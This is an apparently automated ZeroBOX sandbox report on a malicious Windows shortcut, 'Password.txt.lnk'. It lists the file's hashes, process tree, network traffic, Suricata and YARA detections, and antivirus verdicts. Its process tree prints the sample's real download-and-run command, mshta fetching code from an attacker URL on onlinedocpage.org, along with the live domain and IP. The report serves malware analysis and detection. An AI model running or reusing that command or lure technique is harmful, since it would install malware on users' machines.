Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 13, 2021, 5:45 p.m.	Oct. 13, 2021, 5:47 p.m.

Size	2.3KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=70, Archive, ctime=Wed Sep 29 16:52:25 2021, mtime=Tue Oct 12 05:50:07 2021, atime=Wed Sep 29 16:52:25 2021, length=289792, window=hide
MD5	`c44d866adf8c6845b7dda742c59c6b59`
SHA256	`a042bfeee49345d514c274e5f44da374eb0875da4a5671e8bf67005078c076fd`
CRC32	`9EAC5B90`
ssdeep	`24:8doPJ/PbCgQlzASPx+/cfvnZwrMPLj+/QT4I021XQaR3+PwckKVtCGO+/efmzB:8dwBYUSvZlTjfMI7Xv3vOvO5`
Yara	Generic_Malware_Zero - Generic Malware Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "gKqh" C:\Users\test22\AppData\Local\Temp\Password.txt.lnk
896
- cmd.exe "C:\Windows\System32\cmd.exe" /c start /b mshta https://www.onlinedocpage.org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=
  2272
  - mshta.exe mshta https://www.onlinedocpage.org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=
    2332

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.27 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.57	119.207.65.74
www.onlinedocpage.org	A 149.28.162.113	149.28.162.113

IP Address	Status	Action
121.254.136.27	Active	Moloch
149.28.162.113	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49172 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49168 -> 149.28.162.113:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49172 149.28.162.113:443	None	None	None
TLSv1 192.168.56.102:49168 149.28.162.113:443	C=US, O=Let's Encrypt, CN=R3	CN=onlinedocpage.org	9f:8c:c7:f8:24:f3:11:5a:90:96:ed:5a:f4:62:93:56:2a:4a:3e:32

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 13, 2021, 5:45 p.m.		1	1	0

Performs some HTTP requests (2 events)

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET https://www.onlinedocpage.org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 13, 2021, 5:45 p.m.	process_identifier: 2332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f92000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Oct. 13, 2021, 5:45 p.m.	process_identifier: 2332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72763000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Password.txt.lnk

Creates a suspicious process (2 events)

cmdline	mshta https://www.onlinedocpage.org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=
cmdline	"C:\Windows\System32\cmd.exe" /c start /b mshta https://www.onlinedocpage.org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 13, 2021, 5:45 p.m.	process_identifier: 2332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 13, 2021, 5:45 p.m.	flags: 15 family: 0		111	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://www.onlinedocpage.org/FcsDjkkPVjEsM6htE

Yara rule detected in process memory (39 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 13, 2021, 5:45 p.m.	key_handle: 0x000002dc regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.068F8022
FireEye	Heur.BZC.YAX.Nioc.1.068F8022
CAT-QuickHeal	LNK.Exploit.Gen
Arcabit	Heur.BZC.YAX.Nioc.1.068F8022
ESET-NOD32	LNK/Agent.GX
BitDefender	Heur.BZC.YAX.Nioc.1.068F8022
Ad-Aware	Heur.BZC.YAX.Nioc.1.068F8022
Sophos	Troj/DownLnk-X
Emsisoft	Heur.BZC.YAX.Nioc.1.068F8022 (B)
SentinelOne	Static AI - Malicious LNK
MAX	malware (ai score=84)
Microsoft	Trojan:Script/Wacatac.B!ml
GData	Heur.BZC.YAX.Nioc.1.068F8022
VBA32	suspected of Trojan.Link.URL
Zoner	Probably Heur.LNKScript
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)

Modifies proxy override settings possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 13, 2021, 5:45 p.m.	key_handle: 0x000002dc regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 896 resumed a thread in remote process 2272
Process injection	Process 2272 resumed a thread in remote process 2332
NtResumeThread Oct. 13, 2021, 5:45 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2272	1	0	0
NtResumeThread Oct. 13, 2021, 5:45 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2332	1	0	0

Password.txt.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All